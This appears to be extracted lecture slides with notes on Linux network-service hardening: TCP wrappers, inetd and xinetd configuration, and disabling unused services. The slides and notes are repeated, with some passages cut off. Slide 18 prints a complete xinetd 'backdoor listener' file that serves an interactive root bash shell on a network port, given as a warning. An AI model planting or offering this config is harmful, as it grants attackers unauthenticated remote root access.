1 TCP Wrapper Provides host-based access control to network services It has the following features: Logging Access Control Host Name Verification User Name Verification Spoofing Protection
2 TCP Wrapper Has the following advantages over other network service control techniques: Transparency to both the client host and the wrapped network service - Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Allowed users are connected to the requested service while connections from disallowed clients fail Centralized management of multiple protocols - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management
3 TCP Wrapper Advantages TCP wrappers provide the following advantages over other network service control techniques: Transparency - both the connecting client and the wrapped network service are unaware that TCP wrappers are in use Centralized management - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management
4 TCP Wrapper Disadvantages Services must be compiled with the libwrap library Only works with a super-daemon such as inetd or xinetd Ident service not reliable Doesn t wrap RPC services TCP Wrappers is not a firewall replacement
5 TCP Wrapper Files tcpd TCP wrappers deamon tcpdchk and tcpdmatch - test programs for tcpd /etc/hosts.allow - names of the hosts allowed /etc/hosts.deny - names of the hosts NOT allowed Note: If the same client/user/ip is listed in both hosts.allow and hosts.deny, then hosts.allow takes precedence and access is permitted. If the client is listed in hosts.allow, then is access permitted. If the client is listed in hosts.deny, then access is denied. If no rules for the service are found in either file, or if neither file exists, access to the service is granted
6 TCP Wrapper Services In order to gain the benefit of TCP wrappers, the service must be compiled to support the services For example, to determine if sshd is compiled with TCP wrappers support type the command: ldd /usr/sbin/sshd grep libwrap libwrap.so.0 => /lib64/libwrap.so.0 (0x0.. If not supported, rebuild program with option to support
7 TCP Wrapper Operation tcpd intercepts connection request tcpd evaluates connection attributes with host.allow/host.deny If allowed, tcpd releases control of the connection to the requested service If denied, tcpd does not release control of the connection
8 TCP Wrapper Configuration /etc/hosts.allow and /etc/hosts.deny use the format: daemon_list : client_list [ : option : \ option :... ] Where, daemon_list - a list of one or more daemons client_list - a list of one or more hosts option - optional action list
9 TCP Wrapper Wildcards The access control language supports explicit wildcards: ALL - The universal wildcard, always matches LOCAL - Matches host whose name does not contain a dot UNKNOWN - Matches any unknown name/address KNOWN - Matches any known name/address PARANOID - Matches any host whose name does not match its address
10 TCP Wrapper Examples Set default policy to deny all access (/etc/hosts.deny): ALL: ALL Explicitly permit authorized hosts (/etc/hosts.allow): popd : 192.168.1.200 192.168.1.104 imapd : 192.168.1.0/255.255.255.0 sendmail : 192.168.1.0/255.255.255.0 sshd :.xyz.com
11 TCP Wrapper twist Option Send a message back to the source of the attempted connection after it is dropped append the following to /etc/hosts.allow: ALL :.notallowed.com \ : severity auth.info \ : twist /bin/echo Not allowed %d %h." The message Not allowed to use daemon from hostname. will be returned for any daemon not previously configured in the access file. This sends a message back to the source of the attempted connection after it is dropped
12 TCP Wrapper spawn Option Another possibility is to use spawn which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following: ALL :.malware.com \ : spawn (/bin/echo %a from %h \ attempted to access %d >> \ /var/log/connections.log) \ : deny This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the accessed daemon to /var/log/connections.log.
13 Network Super Server Listen for network connection on behalf of another program Hands off control of that connection to intended server Help reduce memory load and improve security There are two different super servers: inetd use TCP Wrappers to handle security xinetd has builtin security features Servers that normally use super server: telnet, FTP, TFTP, rlogin, finger, POP, IMAP
14 inetd Configuration service socket protocol {wait nowait} user server parms service name of the service from /etc/services socket can be stream, dgram or raw protocol can be tcp or udp wait/nowait wait for dgram and nowait for other types user username used to run the server server server binary file, usually /usr/sbin/tcpd parms parameters that are passed to the server ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd
xinetd Configuration service ftp { socket_type = stream protocol = tcp wait = no user = ftp server = /usr/sbin/in.ftpd server_args = -i disable = no } Disable a service: change disable to yes To restart the xinetd service: /etc/init.d/xinetd {restart reload} 15
16 xinetd Security Enhancements Listen to only one network interface for the service: bind = <IP Address> Accept connections only from IP addresses: only_from = <IP Addresses Network> Deny connections only from IP addresses: no_access = <IP Addresses Network> Set times during which users may access the server: access_times = hour:min-hour:min If access is prohibited, send banner to client: banner = /usr/local/etc/deny_banner
17 To Run or Not to Run xinetd To run: Conserves resources Runs daemons only when needed Provides an additional layer of security and can Turn virtually any script or program into a service Not to run: Another vulnerable service Can secure services using other methods Can be used to create a backdoor listener
xinetd Backdoor Listener service kazaa { disable = no protocol = tcp socket_type = stream wait = no user = root server = /bin/bash server_args = -i } xinetd reads this file and determines port from /etc/services 18
19 Evaluation Order Firewall Allowed Rejected TCP Wrappers Allowed xinetd Allowed TCP Wrapped Network Service xinetd Controlled Network Service
20 Disable Services/Interfaces Disable DHCP, configure static IP Disable, remove, unused protocols such as IPv6 Disable wireless networking (to include Bluetooth) Disable/remove clear text protocols and use their secure replacement
TCP Wrapper Provides host-based access control to network services It has the following features: Logging Access Control Host Name Verification User Name Verification Spoofing Protection 1 The TCP wrappers package (tcp_wrappers) is typically installed by default on current distributions and provides host-based access control to network services. It has the following features: Logging - Connections that are monitored by the TCP wrappers daemon (tcpd) are reported through the syslog facility. Access Control - tcpd supports a simple form of access control that is based on pattern matching. You can also hook the execution of shell commands and scripts when a pattern matches and IP address/mask. Host Name Verification - tcpd verifies the client
TCP Wrapper Has the following advantages over other network service control techniques: Transparency to both the client host and the wrapped network service - Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Allowed users are connected to the requested service while connections from disallowed clients fail Centralized management of multiple protocols - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management 2 The TCP wrappers package (tcp_wrappers) is typically installed by default on current distributions and provides host-based access control to network services. It has the following features: Logging - Connections that are monitored by the TCP wrappers daemon (tcpd) are reported through the syslog facility. Access Control - tcpd supports a simple form of access control that is based on pattern matching. You can also hook the execution of shell commands and scripts when a pattern matches and IP address/mask. Host Name Verification - tcpd verifies the client
TCP Wrapper Advantages TCP wrappers provide the following advantages over other network service control techniques: Transparency - both the connecting client and the wrapped network service are unaware that TCP wrappers are in use Centralized management - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management 3 TCP wrappers provide the following advantages over other network service control techniques: Transparency to both the client host and the wrapped network service Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Legitimate users are logged and connected to the requested service while connections from banned clients fail. Centralized management of multiple protocols TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management.
TCP Wrapper Disadvantages Services must be compiled with the libwrap library Only works with a super-daemon such as inetd or xinetd Ident service not reliable Doesn t wrap RPC services TCP Wrappers is not a firewall replacement 4 Disadvantages: Services must be compiled with the libwrap library. Only works with in conjunction with a super-daemon such as inetd or xinetd. Ident service not reliable - It is nearly impossible for the administrators of the remote service to know whether specific users are connecting via a trustable server or from a computer they themselves control. In the latter case the ident service provides no reliable information. Doesn t wrap RPC services.
TCP Wrapper Files tcpd TCP wrappers deamon tcpdchk and tcpdmatch - test programs for tcpd /etc/hosts.allow - names of the hosts allowed /etc/hosts.deny - names of the hosts NOT allowed Note: If the same client/user/ip is listed in both hosts.allow and hosts.deny, then hosts.allow takes precedence and access is permitted. If the client is listed in hosts.allow, then is access permitted. If the client is listed in hosts.deny, then access is denied. If no rules for the service are found in either file, or if neither file exists, access to the service is granted 5 Advantages: Logs and applies access controls to remote connections Lets you define which daemons are wrapped Performs reverse lookup on host IPs Disadvantages: Ident service not reliable Only looks at network daemons spawned by inetd (xinetd has its own way of performing this function) Doesn t wrap ALL services (RPC) Could give a false sense of security tcpdchk and tcpdmatch - test programs for tcpd
TCP Wrapper Services In order to gain the benefit of TCP wrappers, the service must be compiled to support the services For example, to determine if sshd is compiled with TCP wrappers support type the command: ldd /usr/sbin/sshd grep libwrap libwrap.so.0 => /lib64/libwrap.so.0 (0x0.. If not supported, rebuild program with option to support 6 In order to gain the benefit of TCP wrappers, the service must be compiled to support the services. To determine if the service you wish to protect with TCP wrappers is built with TCP wrappers support use the command ldd which prints shared library dependencies. For example, to determine if sshd is compiled with TCP wrappers support type the command: ldd /usr/sbin/sshd linux-vdso.so.1 => (0x00007fff54dfe000) libfipscheck.so.1 =>
TCP Wrapper Operation tcpd intercepts connection request tcpd evaluates connection attributes with host.allow/host.deny If allowed, tcpd releases control of the connection to the requested service If denied, tcpd does not release control of the connection 7 When a connection attempt is made to a TCP wrapped service, the tcpd service first references the hosts access files (/etc/hosts.allow and /etc/hosts.deny) to determine if the client host is allowed to connect. If configured, and it should be, the name of the requesting host and the requested service is written using syslog. If a client host is allowed to connect, TCP wrappers release control of the connection to the requested service and do not interfere further with communication between the client host
TCP Wrapper Configuration /etc/hosts.allow and /etc/hosts.deny use the format: daemon_list : client_list [ : option : \ option :... ] Where, daemon_list - a list of one or more daemons client_list - a list of one or more hosts option - optional action list 8 Both /etc/hosts.allow and /etc/hosts.deny uses the following format: daemon_list : client_list [ : option : option :... ] Where, daemon_list - a list of one or more daemon process names. client_list - a list of one or more host names, host addresses, patterns or wildcards that will be matched against the client host name or address. option - optional action or
TCP Wrapper Wildcards The access control language supports explicit wildcards: ALL - The universal wildcard, always matches LOCAL - Matches host whose name does not contain a dot UNKNOWN - Matches any unknown name/address KNOWN - Matches any known name/address PARANOID - Matches any host whose name does not match its address 9 WildCards - the access control language supports explicit wildcards: ALL matches. - The universal wildcard, always LOCAL - Matches any host whose name does not contain a dot character. UNKNOWN - Matches any user whose name is unknown, and matches any host whose name or address are unknown. This pattern should be used with care: host names may be unavailable due to temporary name server problems. A network address will be unavailable when the software cannot figure
TCP Wrapper Examples Set default policy to deny all access (/etc/hosts.deny): ALL: ALL Explicitly permit authorized hosts (/etc/hosts.allow): popd : 192.168.1.200 192.168.1.104 imapd : 192.168.1.0/255.255.255.0 sendmail : 192.168.1.0/255.255.255.0 sshd :.xyz.com 10 TCPD Configuration Examples Set default policy to deny all access. Edit the file /etc/hosts.deny as follows: ALL: ALL Once the default deny policy is applied, you have to explicitly permit authorized hosts by adding them to the /etc/hosts.allow: popd : 192.168.1.200 192.168.1.104 imapd : 192.168.1.0/255.255.255.0 sendmail : 192.168.1.0/255.255.255.0
TCP Wrapper twist Option Send a message back to the source of the attempted connection after it is dropped append the following to /etc/hosts.allow: ALL :.notallowed.com \ : severity auth.info \ : twist /bin/echo Not allowed %d %h." The message Not allowed to use daemon from hostname. will be returned for any daemon not previously configured in the access file. This sends a message back to the source of the attempted connection after it is dropped 11 Suppose that a situation occurs where a connection should be denied and a reason should be sent to the source of the attempted connection. That action is possible with twist. When a connection attempt is made, twist executes a shell command or script and sends it to the source of the attempted connection. For example, append the following to /etc/hosts.allow: ALL :.notallowed.com \ : severity auth.info \ : twist /bin/echo "You are not welcome to use %d from %h." In this example, the message You are
TCP Wrapper spawn Option Another possibility is to use spawn which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following: ALL :.malware.com \ : spawn (/bin/echo %a from %h \ attempted to access %d >> \ /var/log/connections.log) \ : deny This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the accessed daemon to /var/log/connections.log. 12 Another possibility is to use spawn which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following: ALL :.malware.com \ : spawn (/bin/echo %a from %h attempted to access %d >> \ /var/log/connections.log) \ : deny This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the daemon to which access was attempted to
Network Super Server Listen for network connection on behalf of another program Hands off control of that connection to intended server Help reduce memory load and improve security There are two different super servers: inetd use TCP Wrappers to handle security xinetd has builtin security features Servers that normally use super server: telnet, FTP, TFTP, rlogin, finger, POP, IMAP 13 Unix super servers: Listen for network connection on behalf of another program Hands off control of that connection to intended server Help reduce memory load and improve security There are two different super servers: inetd use TCP Wrappers to handle security xinetd has builtin security features
inetd Configuration service socket protocol {wait nowait} user server parms service name of the service from /etc/services socket can be stream, dgram or raw protocol can be tcp or udp wait/nowait wait for dgram and nowait for other types user username used to run the server server server binary file, usually /usr/sbin/tcpd parms parameters that are passed to the server ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd 14 inetd has been deprecated by xinetd, so it is recommended to replace it with xinetd. You may run into existing systems using inetd, so it is good to know how to read the configuration so you can convert from inetd format to xinetd. Main configuration file: /etc/inetd.conf Other configuration files typically in /etc/inetd.d/
xinetd Configuration service ftp { socket_type = stream protocol = tcp wait = no user = ftp server = /usr/sbin/in.ftpd server_args = -i disable = no } Disable a service: change disable to yes To restart the xinetd service: /etc/init.d/xinetd {restart reload} 15 Configuration file: /etc/xinetd.conf Files in /etc/xinetd.d/ are included Each server run via xinetd installs a file in /etc/xinetd.d Syntax of /etc/xinetd.conf Example: service ftp
xinetd Security Enhancements Listen to only one network interface for the service: bind = <IP Address> Accept connections only from IP addresses: only_from = <IP Addresses Network> Deny connections only from IP addresses: no_access = <IP Addresses Network> Set times during which users may access the server: access_times = hour:min-hour:min If access is prohibited, send banner to client: banner = /usr/local/etc/deny_banner 16 Using the following options in /etc/xinetd.conf Listen to only one network interface for the service: bind = <IP Address> Accept connections only from IP addresses (similar to TCP Wrapper s host.allow): only_from = <IP Addresses Network> Deny connections only from IP addresses (similar to TCP Wrapper s host.deny):
To Run or Not to Run xinetd To run: Conserves resources Runs daemons only when needed Provides an additional layer of security and can Turn virtually any script or program into a service Not to run: Another vulnerable service Can secure services using other methods Can be used to create a backdoor listener 17 Reasons to run xinetd: xinetd conserves resources, runs daemons only when needed, provides an additional layer of security and can "box" a service into a directory with "change root., and it can turn virtually any script or program into a service (this can be bad, see next). Reasons to not run xinetd: Like any additional service, it has suffered from vulnerabilities. Although, there are currently no known
xinetd Backdoor Listener service kazaa { disable = no protocol = tcp socket_type = stream wait = no user = root server = /bin/bash server_args = -i } xinetd reads this file and determines port from /etc/services 18 Here is an example of a xinetd backdoor listener: Create an file in /etc/xinetd.d/kazaa service kazaa { disable = no protocol = tcp socket_type = stream wait = no user = root server = /bin/bash server_args = -i }
Evaluation Order Firewall Allowed Rejected TCP Wrappers Allowed xinetd TCP Wrapped Network Service Allowed xinetd Controlled Network Service 19 The firewall, TCP wrappers, and xinetd function independently of each other and each provide a layer of protection. When troubleshooting connectivity problems when using these services together, follow the chart and watch the logs to find the service responsible.
Disable Services/Interfaces Disable DHCP, configure static IP Disable, remove, unused protocols such as IPv6 Disable wireless networking (to include Bluetooth) Disable/remove clear text protocols and use their secure replacement 20 Network Interfaces and protocols: Most distributions use DHCP by default. For enhanced security, configure a static IP address. This ensures the system maintains the same address at all times and any external system such as a firewall or IDS is protecting this system as it maintains its static IP address. Another solution would be to use a reservation in DHCP. Disabled unused protocols such as IPv6. This prevents attackers from using protocols that you may not be monitoring. Wireless networking presents a risk to leakage of information. The best solution is to remove the wireless hardware, but if that is not feasible, then the drivers can be removed. Although Bluetooth supposedly has a limited range, there are proof of concept interception of Bluetooth signals from a fairly large distance. It may also be possible to disable wireless in the BIOS. Disable/remove all clear text protocols. Use other options such as SSH.